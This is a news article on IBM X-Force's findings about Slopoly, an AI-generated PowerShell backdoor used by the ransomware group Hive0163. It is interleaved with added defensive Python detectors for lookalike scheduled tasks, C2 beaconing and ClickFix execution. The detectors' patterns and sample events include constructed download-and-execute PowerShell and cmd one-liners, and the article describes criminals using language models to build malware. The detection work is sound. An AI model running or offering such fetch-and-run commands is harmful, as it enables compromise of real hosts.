
Hive0163 Employs AI-Enhanced Slopoly Malware for Ongoing Access in Ransomware Operations

IBM X-Force researchers have documented an AI-generated malware family, Slopoly, in use by the financially motivated threat group Hive0163. The malware itself is unremarkable; what makes it notable is its origin, which points to how quickly criminal crews can now produce new tooling with large language models.

Golo Mühr of IBM X-Force, who shared the findings with The Hacker News, said that while the malware is relatively basic at this stage, it shows how threat actors can use AI to stand up new malware frameworks far faster than they could by hand. The barrier to entry for building and iterating on attack tooling is falling.

Hive0163 is an extortion-focused e-crime group known for large-scale data theft and ransomware deployment. It has been linked to a set of tools including NodeSnake, Interlock RAT, the JunkFiction loader, and Interlock ransomware, reflecting a multi-stage operation in which several components are chained toward the same goal.

X-Force's analysis centers on a ransomware intrusion from early 2026 in which the group deployed Slopoly during post-exploitation. Its job was to keep access to the compromised servers open, in this case for up to a week, which is exactly the kind of foothold an operator needs before moving to extortion.

The investigation traced Slopoly to a PowerShell script, likely produced by a builder tool, that persisted on victim systems through a scheduled task named "Runtime Broker" (a name borrowed from a legitimate Windows process, RuntimeBroker.exe, which is not a scheduled task). The script carries the hallmarks of code written with a large language model: verbose comments, logging functions, and neatly structured error handling. One comment describes it as a "Polymorphic C2 Persistence Client," identifying it as the agent side of a command-and-control (C2) framework for remote management and command execution.
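A scheduled task named after a Windows component is a cheap thing to hunt for. The following Python, added here as an illustration and not part of X-Force's report or of the Slopoly code, triages exported Task Scheduler definitions (the XML files under C:\Windows\System32\Tasks, or the output of schtasks /query /xml) and flags tasks whose name mimics Runtime Broker or whose action launches PowerShell with switches common in script persistence. The sample task definitions, file paths and the switch list are constructed; the actual arguments behind Slopoly's task are not published.

```python
"""Triage exported Task Scheduler XML for PowerShell persistence.

Added example, not code from the X-Force report or from Slopoly. The task
definitions below are constructed; only the task name "Runtime Broker" comes
from the reporting on this intrusion.
"""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# RuntimeBroker.exe is a Windows process, not a scheduled task, so a task
# registered under this name is anomalous on its own.
LOOKALIKE_NAMES = {"runtime broker", "runtimebroker"}

# Launcher switches and cradles common in script-based persistence. These are
# generic indicators (assumed), not Slopoly's actual command line.
SUSPICIOUS_ARGS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(xecutionpolicy|p)\s+bypass|-enc(odedcommand)?\b"
    r"|\biex\b|invoke-expression|downloadstring)",
    re.IGNORECASE,
)
POWERSHELL = re.compile(r"(^|\\)(powershell|pwsh)(\.exe)?$", re.IGNORECASE)


def analyze_task(xml_text):
    """Return a list of findings for one task definition; empty means benign."""
    root = ET.fromstring(xml_text)
    uri = root.findtext("t:RegistrationInfo/t:URI", default="", namespaces=NS)
    name = uri.rsplit("\\", 1)[-1].strip().lower()
    findings = []
    if name in LOOKALIKE_NAMES:
        findings.append(f"lookalike task name: {uri}")
    for action in root.findall("t:Actions/t:Exec", NS):
        cmd = action.findtext("t:Command", default="", namespaces=NS).strip().strip('"')
        args = action.findtext("t:Arguments", default="", namespaces=NS).strip()
        if POWERSHELL.search(cmd):
            findings.append(f"PowerShell launcher: {cmd} {args}".rstrip())
            if SUSPICIOUS_ARGS.search(args):
                findings.append("suspicious launcher switches in arguments")
    return findings


def triage_tasks(task_files):
    """Map {path: xml} -> {path: findings} for tasks with at least one finding."""
    report = {}
    for path, xml_text in task_files.items():
        findings = analyze_task(xml_text)
        if findings:
            report[path] = findings
    return report


# Constructed sample task files (hypothetical paths and contents).
SAMPLE_TASKS = {
    r"Tasks\Runtime Broker": r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Runtime Broker</URI></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-w hidden -ep bypass -File C:\ProgramData\update\client.ps1</Arguments>
    </Exec>
  </Actions>
</Task>""",
    r"Tasks\Microsoft\Windows\Defrag\ScheduledDefrag": r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Microsoft\Windows\Defrag\ScheduledDefrag</URI></RegistrationInfo>
  <Actions Context="Author">
    <Exec><Command>%windir%\system32\defrag.exe</Command><Arguments>-c -h -o -$</Arguments></Exec>
  </Actions>
</Task>""",
    r"Tasks\IT\InventoryCollector": r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\IT\InventoryCollector</URI></RegistrationInfo>
  <Actions Context="Author">
    <Exec><Command>powershell.exe</Command><Arguments>-NoProfile -File C:\Scripts\inventory.ps1</Arguments></Exec>
  </Actions>
</Task>""",
}

if __name__ == "__main__":
    for path, findings in triage_tasks(SAMPLE_TASKS).items():
        print(path)
        for finding in findings:
            print("  -", finding)
```

The admin inventory task is reported as a PowerShell launcher but without the hidden-window or policy-bypass switches, so an analyst can tier the results rather than treat every PowerShell task as hostile; the lookalike name is the strongest single signal here.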

Mühr cautioned that the "polymorphic" label oversells it: the script has no ability to modify its own code at runtime. The polymorphism lives in the builder, which stamps out new clients with different configuration values and function names, a routine practice among malware developers. AI may have written the code, but it has not made the tradecraft more sophisticated.

Functionally the script is a backdoor. It sends a heartbeat containing system information to the C2 server every 30 seconds, polls for commands every 50 seconds, executes whatever it receives, and returns the output. The report does not disclose which commands the operators issued, so the full extent of what was done through the backdoor is unknown.
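Two fixed timers of 30 and 50 seconds are a network-side signature regardless of what the commands were. The Python below, an added example and not code from the X-Force report, groups proxy-log requests by source, destination and path, and flags streams whose inter-arrival times barely deviate from their median. The log lines are constructed: one host calling a C2 server on both cadences, plus ordinary browsing to another site. Splitting the two timers by URL path is an assumption; if both message types hit the same endpoint, group by destination only and expect a blended cadence instead.

```python
"""Flag fixed-interval callbacks (beaconing) in web proxy logs.

Added example, not code from the X-Force report. The log lines are constructed:
one host talking to a C2 server on a 30-second and a 50-second timer, matching
the cadence described for Slopoly, plus ordinary browsing to another site. The
two URL paths are an assumption used to separate the two timers.
"""
from collections import defaultdict
from datetime import datetime, timezone
from statistics import median

# Constructed log: time src dst path (RFC 5737 documentation addresses).
SAMPLE_LOG = """\
2026-02-03T10:00:00Z 10.0.5.21 198.51.100.7 /api/hb
2026-02-03T10:00:30Z 10.0.5.21 198.51.100.7 /api/hb
2026-02-03T10:01:01Z 10.0.5.21 198.51.100.7 /api/hb
2026-02-03T10:01:30Z 10.0.5.21 198.51.100.7 /api/hb
2026-02-03T10:02:00Z 10.0.5.21 198.51.100.7 /api/hb
2026-02-03T10:02:31Z 10.0.5.21 198.51.100.7 /api/hb
2026-02-03T10:03:00Z 10.0.5.21 198.51.100.7 /api/hb
2026-02-03T10:03:30Z 10.0.5.21 198.51.100.7 /api/hb
2026-02-03T10:04:00Z 10.0.5.21 198.51.100.7 /api/hb
2026-02-03T10:04:30Z 10.0.5.21 198.51.100.7 /api/hb
2026-02-03T10:05:00Z 10.0.5.21 198.51.100.7 /api/hb
2026-02-03T10:00:00Z 10.0.5.21 198.51.100.7 /api/tasks
2026-02-03T10:00:50Z 10.0.5.21 198.51.100.7 /api/tasks
2026-02-03T10:01:40Z 10.0.5.21 198.51.100.7 /api/tasks
2026-02-03T10:02:31Z 10.0.5.21 198.51.100.7 /api/tasks
2026-02-03T10:03:20Z 10.0.5.21 198.51.100.7 /api/tasks
2026-02-03T10:04:10Z 10.0.5.21 198.51.100.7 /api/tasks
2026-02-03T10:05:00Z 10.0.5.21 198.51.100.7 /api/tasks
2026-02-03T10:00:03Z 10.0.5.21 203.0.113.10 /
2026-02-03T10:00:07Z 10.0.5.21 203.0.113.10 /
2026-02-03T10:00:08Z 10.0.5.21 203.0.113.10 /
2026-02-03T10:01:35Z 10.0.5.21 203.0.113.10 /
2026-02-03T10:01:36Z 10.0.5.21 203.0.113.10 /
2026-02-03T10:03:30Z 10.0.5.21 203.0.113.10 /
2026-02-03T10:05:00Z 10.0.5.21 203.0.113.10 /
"""


def parse_streams(log_text):
    """Group request timestamps (epoch seconds) by (src, dst, path)."""
    streams = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, path = line.split()
        t = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        streams[(src, dst, path)].append(t.timestamp())
    return streams


def find_beacons(log_text, min_events=6, max_jitter_ratio=0.1):
    """Return {(src, dst, path): period_seconds} for low-jitter request streams.

    Period is the median inter-arrival time; jitter is the median absolute
    deviation from it. A timer-driven client stays well under 10% even with a
    little randomisation, while human browsing is nowhere near periodic.
    """
    beacons = {}
    for key, times in parse_streams(log_text).items():
        if len(times) < min_events:
            continue
        times.sort()
        deltas = [b - a for a, b in zip(times, times[1:])]
        period = median(deltas)
        if period <= 0:
            continue
        jitter = median(abs(d - period) for d in deltas)
        if jitter / period <= max_jitter_ratio:
            beacons[key] = round(period)
    return beacons


if __name__ == "__main__":
    for (src, dst, path), period in find_beacons(SAMPLE_LOG).items():
        print(f"{src} -> {dst}{path}: every {period}s")
```

Raise min_events on real data so a handful of retries does not look periodic, and run the check per destination as well as per path, since a client that randomises its sleep will still show a tight cadence around its base period.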

Initial access in this intrusion came through ClickFix, a social engineering technique that talks users into running malicious PowerShell commands themselves. That step downloaded NodeSnake, the first-stage implant associated with Hive0163, which can run shell commands, maintain persistence, and fetch heavier frameworks such as Interlock RAT for execution.
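Because ClickFix ends with the victim pasting a command into the Run dialog or a console, the resulting interpreter is a child of explorer.exe with a command line that fetches something from the network and runs it. The Python below, added here and not taken from the X-Force report, applies that pattern to process-creation events. The Sysmon-style records are constructed, and the command lines are generic download-and-execute shapes rather than the ones used in this intrusion.

```python
"""Detect ClickFix-style execution in process-creation telemetry.

Added example, not code from the X-Force report. The JSON events below are
constructed Sysmon-like records (assumed field names ProcessId, Image,
ParentImage, CommandLine); the command lines are generic patterns.
"""
import json
import re

INTERPRETERS = re.compile(r"(^|\\)(powershell|pwsh|cmd|mshta|wscript|cscript)\.exe$", re.I)
# Primitives that pull content from the network.
FETCH = re.compile(
    r"(invoke-webrequest|invoke-restmethod|\biwr\b|\birm\b|downloadstring|downloadfile|"
    r"\bcurl\b|\bcertutil\b|\bbitsadmin\b|\bmshta\b\s+https?://)",
    re.I,
)
# Primitives that execute what was fetched.
EXECUTE = re.compile(
    r"(\biex\b|invoke-expression|\bstart\b|\bwscript\b|\bcscript\b|\bmshta\b|"
    r"\|\s*(powershell|pwsh|cmd)\b)",
    re.I,
)


def classify(event):
    """Return a reason string if the event matches the ClickFix shape, else None."""
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    if parent != "explorer.exe":
        return None  # not launched from the Run dialog or File Explorer
    m = INTERPRETERS.search(event.get("Image", ""))
    if not m:
        return None
    cmd = event.get("CommandLine", "")
    fetch, run = FETCH.search(cmd), EXECUTE.search(cmd)
    if not (fetch and run):
        return None
    return (f"{m.group(2)}.exe spawned by explorer.exe fetches ({fetch.group(0)}) "
            f"and executes ({run.group(0)})")


def scan(jsonl):
    """Return {ProcessId: reason} for every event that matches."""
    hits = {}
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        reason = classify(event)
        if reason:
            hits[event["ProcessId"]] = reason
    return hits


# Constructed events: a pasted PowerShell cradle, a user opening a console,
# a management agent legitimately downloading a file, and a pasted cmd cradle.
SAMPLE_EVENTS = r"""
{"ProcessId": 4412, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell -w hidden -c \"iex (irm http://203.0.113.25/verify)\""}
{"ProcessId": 4488, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe"}
{"ProcessId": 6020, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\CCM\\CcmExec.exe", "CommandLine": "powershell.exe -NoProfile -Command \"Invoke-WebRequest https://updates.example.internal/agent.msi -OutFile C:\\Temp\\agent.msi\""}
{"ProcessId": 5120, "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "cmd /c curl -s http://203.0.113.25/n.js -o %TEMP%\\n.js && start /min wscript %TEMP%\\n.js"}
"""

if __name__ == "__main__":
    for pid, reason in scan(SAMPLE_EVENTS).items():
        print(pid, reason)
```

On a live host, corroborate a hit with the user's RunMRU key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), which records what was typed into the Run dialog; the pasted command surviving there is the clearest evidence that the victim, not a dropper, launched the first stage.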

Hive0163 has previously paired ClickFix with malvertising for initial access, and it also works with initial access brokers such as TA569 (SocGholish) and TAG-124 (tied to KongTuke and LandUpdate808) to get into victim environments.

Slopoly is not a single script. Its components are written in PowerShell, PHP, C/C++, Java, and JavaScript, giving it clients for both Windows and Linux. Like NodeSnake, the clients reach out to remote servers to execute commands, open SOCKS5 proxy tunnels, spawn reverse shells, and stage further payloads, ransomware included.

Slopoly joins a growing list of AI-assisted malware alongside VoidLink and PromptSpy. The pattern is consistent: criminals use AI to speed up malware development and scale their operations, not to invent new techniques.

IBM X-Force's assessment is that AI-generated malware does not, so far, raise the technical ceiling of the threat. What it changes is the cost and turnaround time of building and running attacks, and that gain in attacker efficiency, rather than any leap in capability, is what defenders should plan around.
